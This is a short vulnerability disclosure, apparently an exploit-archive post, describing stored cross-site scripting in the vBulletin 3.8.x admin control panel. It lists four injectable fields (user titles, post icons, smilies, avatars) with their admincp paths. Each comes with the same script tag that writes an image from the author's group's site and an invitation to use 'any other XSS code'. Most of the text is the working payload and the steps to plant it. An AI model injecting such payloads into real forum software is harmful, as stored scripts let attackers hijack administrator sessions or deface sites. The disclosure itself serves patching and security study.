vBulletin 3.8.2 Cross Site Scripting

`vBulletin 3.8.2 adminCP Cross-Site Scripting  
R.I.P DrtRp - We miss you  
---------------------------------------------  
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179  
Greetz to Aura & all Aria-Security Mods & Members  
  
These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.  
  
1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.  
  
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>  
or any other XSS code.  
  
2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.  
  
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>  
  
3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.  
  
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>  
  
4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.  
  
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>  
  
  
  
The-0utl4w  
http://Aria-Security.com  
/* the-0utl4w.com  
`